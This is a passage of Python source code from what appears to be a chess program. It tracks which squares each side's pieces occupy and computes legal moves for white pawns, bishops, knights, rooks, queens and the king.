self.black_occupation_x = []
self.black_occupation_y = []
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.white_occupation_x.append(self.white_pawns_inf[i][0])
self.white_occupation_y.append(self.white_pawns_inf[i][1])
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
self.white_occupation_x.append(self.white_knights_inf[i][0])
self.white_occupation_y.append(self.white_knights_inf[i][1])
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
self.white_occupation_x.append(self.white_bishops_inf[i][0])
self.white_occupation_y.append(self.white_bishops_inf[i][1])
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
self.white_occupation_x.append(self.white_rooks_inf[i][0])
self.white_occupation_y.append(self.white_rooks_inf[i][1])
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
self.white_occupation_x.append(self.white_queens_inf[i][0])
self.white_occupation_y.append(self.white_queens_inf[i][1])
if self.white_king_inf[0][2] == True:
self.white_occupation_x.append(self.white_king_inf[0][0])
self.white_occupation_y.append(self.white_king_inf[0][1])
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.black_occupation_x.append(self.black_pawns_inf[i][0])
self.black_occupation_y.append(self.black_pawns_inf[i][1])
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
self.black_occupation_x.append(self.black_knights_inf[i][0])
self.black_occupation_y.append(self.black_knights_inf[i][1])
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
self.black_occupation_x.append(self.black_bishops_inf[i][0])
self.black_occupation_y.append(self.black_bishops_inf[i][1])
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
self.black_occupation_x.append(self.black_rooks_inf[i][0])
self.black_occupation_y.append(self.black_rooks_inf[i][1])
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
self.black_occupation_x.append(self.black_queens_inf[i][0])
self.black_occupation_y.append(self.black_queens_inf[i][1])
if self.black_king_inf[0][2] == True:
self.black_occupation_x.append(self.black_king_inf[0][0])
self.black_occupation_y.append(self.black_king_inf[0][1])
def calc_legal_moves(self):
self.legal_moves = []
if startup.white_turn == True:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
pawn_N_1 = True
pawn_N_2 = True
pawn_NE_11 = False
pawn_NW_11 = False
en_p_NE_11 = False
en_p_NW_11 = False
for j in range(0, len(self.white_occupation_x)):
if self.white_pawns_inf[i][0] == self.white_occupation_x[j] and self.white_pawns_inf[i][1] + 1 == self.white_occupation_y[j]:
pawn_N_1 = False
if self.white_pawns_inf[i][3] == True and self.white_pawns_inf[i][0] == self.white_occupation_x[j] and self.white_pawns_inf[i][1] + 2 == self.white_occupation_y[j]:
pawn_N_2 = False
for j in range(0, len(self.black_occupation_x)):
if self.white_pawns_inf[i][0] == self.black_occupation_x[j] and self.white_pawns_inf[i][1] + 1 == self.black_occupation_y[j]:
pawn_N_1 = False
if self.white_pawns_inf[i][3] == True and self.white_pawns_inf[i][0] == self.black_occupation_x[j] and self.white_pawns_inf[i][1] + 2 == self.black_occupation_y[j]:
pawn_N_2 = False
if self.white_pawns_inf[i][0] + 1 == self.black_occupation_x[j] and self.white_pawns_inf[i][1] + 1 == self.black_occupation_y[j]:
pawn_NE_11 = True
if self.white_pawns_inf[i][0] - 1 == self.black_occupation_x[j] and self.white_pawns_inf[i][1] + 1 == self.black_occupation_y[j]:
pawn_NW_11 = True
if self.white_pawns_inf[i][0] + 1 == self.en_passant_x_y[0] and self.white_pawns_inf[i][1] == self.en_passant_x_y[1]:
pawn_NE_11 = True
elif self.white_pawns_inf[i][0] - 1 == self.en_passant_x_y[0] and self.white_pawns_inf[i][1] == self.en_passant_x_y[1]:
pawn_NW_11 = True
if pawn_N_1 == True:
legal_move_notation = notation.get_notation("P", self.white_pawns_inf[i][0], self.white_pawns_inf[i][1], self.white_pawns_inf[i][0], self.white_pawns_inf[i][1] + 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_N_2 == True and pawn_N_1 == True and self.white_pawns_inf[i][3] == True:
legal_move_notation = notation.get_notation("P", self.white_pawns_inf[i][0], self.white_pawns_inf[i][1], self.white_pawns_inf[i][0], self.white_pawns_inf[i][1] + 2)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_NE_11 == True:
legal_move_notation = notation.get_notation("P", self.white_pawns_inf[i][0], self.white_pawns_inf[i][1], self.white_pawns_inf[i][0] + 1, self.white_pawns_inf[i][1] + 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_NW_11 == True:
legal_move_notation = notation.get_notation("P", self.white_pawns_inf[i][0], self.white_pawns_inf[i][1], self.white_pawns_inf[i][0] - 1, self.white_pawns_inf[i][1] + 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
move_list = ["bishop_NE_1", "bishop_NE_2", "bishop_NE_3", "bishop_NE_4", "bishop_NE_5", "bishop_NE_6", "bishop_NE_7", "bishop_SE_1", "bishop_SE_2", "bishop_SE_3", "bishop_SE_4", "bishop_SE_5", "bishop_SE_6", "bishop_SE_7", "bishop_SW_1", "bishop_SW_2", "bishop_SW_3", "bishop_SW_4", "bishop_SW_5", "bishop_SW_6", "bishop_SW_7", "bishop_NW_1", "bishop_NW_2", "bishop_NW_3", "bishop_NW_4", "bishop_NW_5", "bishop_NW_6", "bishop_NW_7"]
bishop_moves = {
"bishop_NE_1" : True,
"bishop_NE_2" : True,
"bishop_NE_3" : True,
"bishop_NE_4" : True,
"bishop_NE_5" : True,
"bishop_NE_6" : True,
"bishop_NE_7" : True,
"bishop_SE_1" : True,
"bishop_SE_2" : True,
"bishop_SE_3" : True,
"bishop_SE_4" : True,
"bishop_SE_5" : True,
"bishop_SE_6" : True,
"bishop_SE_7" : True,
"bishop_SW_1" : True,
"bishop_SW_2" : True,
"bishop_SW_3" : True,
"bishop_SW_4" : True,
"bishop_SW_5" : True,
"bishop_SW_6" : True,
"bishop_SW_7" : True,
"bishop_NW_1" : True,
"bishop_NW_2" : True,
"bishop_NW_3" : True,
"bishop_NW_4" : True,
"bishop_NW_5" : True,
"bishop_NW_6" : True,
"bishop_NW_7" : True,
}
for j in range(1, 8):
if self.white_bishops_inf[i][0] - j < 0:
for move in move_list:
if move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
if self.white_bishops_inf[i][1] - j < 0:
for move in move_list:
if move[7] == "S" and int(move[10]) >= j:
bishop_moves[move] = False
if self.white_bishops_inf[i][0] + j > 7:
for move in move_list:
if move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
if self.white_bishops_inf[i][1] + j > 7:
for move in move_list:
if move[7] == "N" and int(move[10]) >= j:
bishop_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.white_bishops_inf[i][0] + j == self.white_occupation_x[k] and self.white_bishops_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] + j == self.white_occupation_x[k] and self.white_bishops_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] - j == self.white_occupation_x[k] and self.white_bishops_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] - j == self.white_occupation_x[k] and self.white_bishops_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.white_bishops_inf[i][0] + j == self.black_occupation_x[k] and self.white_bishops_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "E" and int(move[10]) > j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] + j == self.black_occupation_x[k] and self.white_bishops_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "E" and int(move[10]) > j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] - j == self.black_occupation_x[k] and self.white_bishops_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "W" and int(move[10]) > j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] - j == self.black_occupation_x[k] and self.white_bishops_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "W" and int(move[10]) > j:
bishop_moves[move] = False
for move in move_list:
if bishop_moves[move] == True:
if move[7] == "N" and move[8] == "E":
self.legal_moves.append(notation.get_notation("B", self.white_bishops_inf[i][0], self.white_bishops_inf[i][1], self.white_bishops_inf[i][0] + int(move[10]), self.white_bishops_inf[i][1] + int(move[10])))
elif move[7] == "S" and move[8] == "E":
self.legal_moves.append(notation.get_notation("B", self.white_bishops_inf[i][0], self.white_bishops_inf[i][1], self.white_bishops_inf[i][0] + int(move[10]), self.white_bishops_inf[i][1] - int(move[10])))
elif move[7] == "S" and move[8] == "W":
self.legal_moves.append(notation.get_notation("B", self.white_bishops_inf[i][0], self.white_bishops_inf[i][1], self.white_bishops_inf[i][0] - int(move[10]), self.white_bishops_inf[i][1] - int(move[10])))
elif move[7] == "N" and move[8] == "W":
self.legal_moves.append(notation.get_notation("B", self.white_bishops_inf[i][0], self.white_bishops_inf[i][1], self.white_bishops_inf[i][0] - int(move[10]), self.white_bishops_inf[i][1] + int(move[10])))
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
knight_NE_21 = True
knight_NE_12 = True
knight_SE_12 = True
knight_SE_21 = True
knight_SW_21 = True
knight_SW_12 = True
knight_NW_12 = True
knight_NW_21 = True
if self.white_knights_inf[i][0] - 1 < 0:
knight_SW_21 = False
knight_SW_12 = False
knight_NW_12 = False
knight_NW_21 = False
elif self.white_knights_inf[i][0] - 2 < 0:
knight_SW_12 = False
knight_NW_12 = False
if self.white_knights_inf[i][0] + 1 > 7:
knight_NE_21 = False
knight_NE_12 = False
knight_SE_12 = False
knight_SE_21 = False
elif self.white_knights_inf[i][0] + 2 > 7:
knight_NE_12 = False
knight_SE_12 = False
if self.white_knights_inf[i][1] - 1 < 0:
knight_SE_12 = False
knight_SE_21 = False
knight_SW_21 = False
knight_SW_12 = False
elif self.white_knights_inf[i][1] - 2 < 0:
knight_SE_21 = False
knight_SW_21 = False
if self.white_knights_inf[i][1] + 1 > 7:
knight_NE_21 = False
knight_NE_12 = False
knight_NW_12 = False
knight_NW_21 = False
elif self.white_knights_inf[i][1] + 2 > 7:
knight_NE_21 = False
knight_NW_21 = False
for j in range(0, len(self.white_occupation_x)):
if self.white_knights_inf[i][0] + 1 == self.white_occupation_x[j] and self.white_knights_inf[i][1] + 2 == self.white_occupation_y[j]:
knight_NE_21 = False
if self.white_knights_inf[i][0] + 2 == self.white_occupation_x[j] and self.white_knights_inf[i][1] + 1 == self.white_occupation_y[j]:
knight_NE_12 = False
if self.white_knights_inf[i][0] + 2 == self.white_occupation_x[j] and self.white_knights_inf[i][1] - 1 == self.white_occupation_y[j]:
knight_SE_12 = False
if self.white_knights_inf[i][0] + 1 == self.white_occupation_x[j] and self.white_knights_inf[i][1] - 2 == self.white_occupation_y[j]:
knight_SE_21 = False
if self.white_knights_inf[i][0] - 1 == self.white_occupation_x[j] and self.white_knights_inf[i][1] - 2 == self.white_occupation_y[j]:
knight_SW_21 = False
if self.white_knights_inf[i][0] - 2 == self.white_occupation_x[j] and self.white_knights_inf[i][1] - 1 == self.white_occupation_y[j]:
knight_SW_12 = False
if self.white_knights_inf[i][0] - 2 == self.white_occupation_x[j] and self.white_knights_inf[i][1] + 1 == self.white_occupation_y[j]:
knight_NW_12 = False
if self.white_knights_inf[i][0] - 1 == self.white_occupation_x[j] and self.white_knights_inf[i][1] + 2 == self.white_occupation_y[j]:
knight_NW_21 = False
if knight_NE_21 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] + 1, self.white_knights_inf[i][1] + 2))
if knight_NE_12 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] + 2, self.white_knights_inf[i][1] + 1))
if knight_SE_12 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] + 2, self.white_knights_inf[i][1] - 1))
if knight_SE_21 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] + 1, self.white_knights_inf[i][1] - 2))
if knight_SW_21 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] - 1, self.white_knights_inf[i][1] - 2))
if knight_SW_12 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] - 2, self.white_knights_inf[i][1] - 1))
if knight_NW_12 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] - 2, self.white_knights_inf[i][1] + 1))
if knight_NW_21 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] - 1, self.white_knights_inf[i][1] + 2))
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
move_list = ["rook_N_1", "rook_N_2", "rook_N_3", "rook_N_4", "rook_N_5", "rook_N_6", "rook_N_7", "rook_E_1", "rook_E_2", "rook_E_3", "rook_E_4", "rook_E_5", "rook_E_6", "rook_E_7", "rook_S_1", "rook_S_2", "rook_S_3", "rook_S_4", "rook_S_5", "rook_S_6", "rook_S_7", "rook_W_1", "rook_W_2", "rook_W_3", "rook_W_4", "rook_W_5", "rook_W_6", "rook_W_7"]
rook_moves = {
"rook_N_1" : True,
"rook_N_2" : True,
"rook_N_3" : True,
"rook_N_4" : True,
"rook_N_5" : True,
"rook_N_6" : True,
"rook_N_7" : True,
"rook_E_1" : True,
"rook_E_2" : True,
"rook_E_3" : True,
"rook_E_4" : True,
"rook_E_5" : True,
"rook_E_6" : True,
"rook_E_7" : True,
"rook_S_1" : True,
"rook_S_2" : True,
"rook_S_3" : True,
"rook_S_4" : True,
"rook_S_5" : True,
"rook_S_6" : True,
"rook_S_7" : True,
"rook_W_1" : True,
"rook_W_2" : True,
"rook_W_3" : True,
"rook_W_4" : True,
"rook_W_5" : True,
"rook_W_6" : True,
"rook_W_7" : True,
}
for j in range(1, 8):
if self.white_rooks_inf[i][0] - j < 0:
for move in move_list:
if move[5] == "W" and int(move[7]) >= j:
rook_moves[move] = False
if self.white_rooks_inf[i][1] - j < 0:
for move in move_list:
if move[5] == "S" and int(move[7]) >= j:
rook_moves[move] = False
if self.white_rooks_inf[i][0] + j > 7:
for move in move_list:
if move[5] == "E" and int(move[7]) >= j:
rook_moves[move] = False
if self.white_rooks_inf[i][1] + j > 7:
for move in move_list:
if move[5] == "N" and int(move[7]) >= j:
rook_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.white_rooks_inf[i][0] == self.white_occupation_x[k] and self.white_rooks_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "N" and int(move[7]) >= j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] + j == self.white_occupation_x[k] and self.white_rooks_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "E" and int(move[7]) >= j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] == self.white_occupation_x[k] and self.white_rooks_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "S" and int(move[7]) >= j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] - j == self.white_occupation_x[k] and self.white_rooks_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "W" and int(move[7]) >= j:
rook_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.white_rooks_inf[i][0] == self.black_occupation_x[k] and self.white_rooks_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "N" and int(move[7]) > j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] + j == self.black_occupation_x[k] and self.white_rooks_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "E" and int(move[7]) > j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] == self.black_occupation_x[k] and self.white_rooks_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "S" and int(move[7]) > j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] - j == self.black_occupation_x[k] and self.white_rooks_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "W" and int(move[7]) > j:
rook_moves[move] = False
for move in move_list:
if rook_moves[move] == True:
if move[5] == "N":
self.legal_moves.append(notation.get_notation("R", self.white_rooks_inf[i][0], self.white_rooks_inf[i][1], self.white_rooks_inf[i][0], self.white_rooks_inf[i][1] + int(move[7])))
elif move[5] == "E":
self.legal_moves.append(notation.get_notation("R", self.white_rooks_inf[i][0], self.white_rooks_inf[i][1], self.white_rooks_inf[i][0] + int(move[7]), self.white_rooks_inf[i][1]))
elif move[5] == "S":
self.legal_moves.append(notation.get_notation("R", self.white_rooks_inf[i][0], self.white_rooks_inf[i][1], self.white_rooks_inf[i][0], self.white_rooks_inf[i][1] - int(move[7])))
elif move[5] == "W":
self.legal_moves.append(notation.get_notation("R", self.white_rooks_inf[i][0], self.white_rooks_inf[i][1], self.white_rooks_inf[i][0] - int(move[7]), self.white_rooks_inf[i][1]))
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
move_list = ["queen_N_1", "queen_N_2", "queen_N_3", "queen_N_4", "queen_N_5", "queen_N_6", "queen_N_7", "queen_NE_1", "queen_NE_2", "queen_NE_3", "queen_NE_4", "queen_NE_5", "queen_NE_6", "queen_NE_7", "queen_E_1", "queen_E_2", "queen_E_3", "queen_E_4", "queen_E_5", "queen_E_6", "queen_E_7", "queen_SE_1", "queen_SE_2", "queen_SE_3", "queen_SE_4", "queen_SE_5", "queen_SE_6", "queen_SE_7", "queen_S_1", "queen_S_2", "queen_S_3", "queen_S_4", "queen_S_5", "queen_S_6", "queen_S_7", "queen_SW_1", "queen_SW_2", "queen_SW_3", "queen_SW_4", "queen_SW_5", "queen_SW_6", "queen_SW_7", "queen_W_1", "queen_W_2", "queen_W_3", "queen_W_4", "queen_W_5", "queen_W_6", "queen_W_7", "queen_NW_1", "queen_NW_2", "queen_NW_3", "queen_NW_4", "queen_NW_5", "queen_NW_6", "queen_NW_7"]
queen_moves = {
"queen_N_1" : True,
"queen_N_2" : True,
"queen_N_3" : True,
"queen_N_4" : True,
"queen_N_5" : True,
"queen_N_6" : True,
"queen_N_7" : True,
"queen_NE_1" : True,
"queen_NE_2" : True,
"queen_NE_3" : True,
"queen_NE_4" : True,
"queen_NE_5" : True,
"queen_NE_6" : True,
"queen_NE_7" : True,
"queen_E_1" : True,
"queen_E_2" : True,
"queen_E_3" : True,
"queen_E_4" : True,
"queen_E_5" : True,
"queen_E_6" : True,
"queen_E_7" : True,
"queen_SE_1" : True,
"queen_SE_2" : True,
"queen_SE_3" : True,
"queen_SE_4" : True,
"queen_SE_5" : True,
"queen_SE_6" : True,
"queen_SE_7" : True,
"queen_S_1" : True,
"queen_S_2" : True,
"queen_S_3" : True,
"queen_S_4" : True,
"queen_S_5" : True,
"queen_S_6" : True,
"queen_S_7" : True,
"queen_SW_1" : True,
"queen_SW_2" : True,
"queen_SW_3" : True,
"queen_SW_4" : True,
"queen_SW_5" : True,
"queen_SW_6" : True,
"queen_SW_7" : True,
"queen_W_1" : True,
"queen_W_2" : True,
"queen_W_3" : True,
"queen_W_4" : True,
"queen_W_5" : True,
"queen_W_6" : True,
"queen_W_7" : True,
"queen_NW_1" : True,
"queen_NW_2" : True,
"queen_NW_3" : True,
"queen_NW_4" : True,
"queen_NW_5" : True,
"queen_NW_6" : True,
"queen_NW_7" : True,
}
for j in range(1, 8):
if self.white_queens_inf[i][0] - j < 0:
for move in move_list:
if move[6] == "W" or move[7] == "W":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.white_queens_inf[i][1] - j < 0:
for move in move_list:
if move[6] == "S":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.white_queens_inf[i][0] + j > 7:
for move in move_list:
if move[6] == "E" or move[7] == "E":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.white_queens_inf[i][1] + j > 7:
for move in move_list:
if move[6] == "N":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.white_queens_inf[i][0] == self.white_occupation_x[k] and self.white_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.white_occupation_x[k] and self.white_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "E" and int(move[9]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.white_occupation_x[k] and self.white_queens_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "E" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.white_occupation_x[k] and self.white_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "E" and int(move[9]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] == self.white_occupation_x[k] and self.white_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.white_occupation_x[k] and self.white_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "W" and int(move[9]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.white_occupation_x[k] and self.white_queens_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "W" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.white_occupation_x[k] and self.white_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "W" and int(move[9]) >= j:
queen_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.white_queens_inf[i][0] == self.black_occupation_x[k] and self.white_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.black_occupation_x[k] and self.white_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "E" and int(move[9]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.black_occupation_x[k] and self.white_queens_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "E" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.black_occupation_x[k] and self.white_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "E" and int(move[9]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] == self.black_occupation_x[k] and self.white_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.black_occupation_x[k] and self.white_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "W" and int(move[9]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.black_occupation_x[k] and self.white_queens_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "W" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.black_occupation_x[k] and self.white_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "W" and int(move[9]) > j:
queen_moves[move] = False
for move in move_list:
if queen_moves[move] == True:
if move[6] == "N" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0], self.white_queens_inf[i][1] + int(move[8])))
elif move[6] == "N" and move[7] == "E":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] + int(move[9]), self.white_queens_inf[i][1] + int(move[9])))
elif move[6] == "E" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] + int(move[8]), self.white_queens_inf[i][1]))
elif move[6] == "S" and move[7] == "E":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] + int(move[9]), self.white_queens_inf[i][1] - int(move[9])))
elif move[6] == "S" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0], self.white_queens_inf[i][1] - int(move[8])))
elif move[6] == "S" and move[7] == "W":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] - int(move[9]), self.white_queens_inf[i][1] - int(move[9])))
elif move[6] == "W" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] - int(move[8]), self.white_queens_inf[i][1]))
elif move[6] == "N" and move[7] == "W":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] - int(move[9]), self.white_queens_inf[i][1] + int(move[9])))
if self.white_king_inf[0][2] == True:
move_list = ["king_N_1", "king_NE_1", "king_E_1", "king_SE_1", "king_S_1", "king_SW_1", "king_W_1", "king_NW_1"]
king_moves = {
"king_N_1" : True,
"king_NE_1" : True,
"king_E_1" : True,
"king_SE_1" : True,
"king_S_1" : True,
"king_SW_1" : True,
"king_W_1" : True,
"king_NW_1" : True,
}
if self.white_king_inf[0][0] - 1 < 0:
for move in move_list:
if move[5] == "W" or move[6] == "W":
king_moves[move] = False
if self.white_king_inf[0][1] - 1 < 0:
for move in move_list:
if move[5] == "S":
king_moves[move] = False
if self.white_king_inf[0][0] + 1 > 7:
for move in move_list:
if move[5] == "E" or move[6] == "E":
king_moves[move] = False
if self.white_king_inf[0][1] + 1 > 7:
for move in move_list:
if move[5] == "N":
king_moves[move] = False
for i in range(0, len(self.white_occupation_x)):
if self.white_king_inf[0][0] == self.white_occupation_x[i] and self.white_king_inf[0][1] + 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "_":
king_moves[move] = False
elif self.white_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] + 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "E":
king_moves[move] = False
elif self.white_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "E" and move[6] == "_":
king_moves[move] = False
elif self.white_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] - 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "E":
king_moves[move] = False
elif self.white_king_inf[0][0] == self.white_occupation_x[i] and self.white_king_inf[0][1] - 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "_":
king_moves[move] = False
elif self.white_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] - 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "W":
king_moves[move] = False
elif self.white_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "W" and move[6] == "_":
king_moves[move] = False
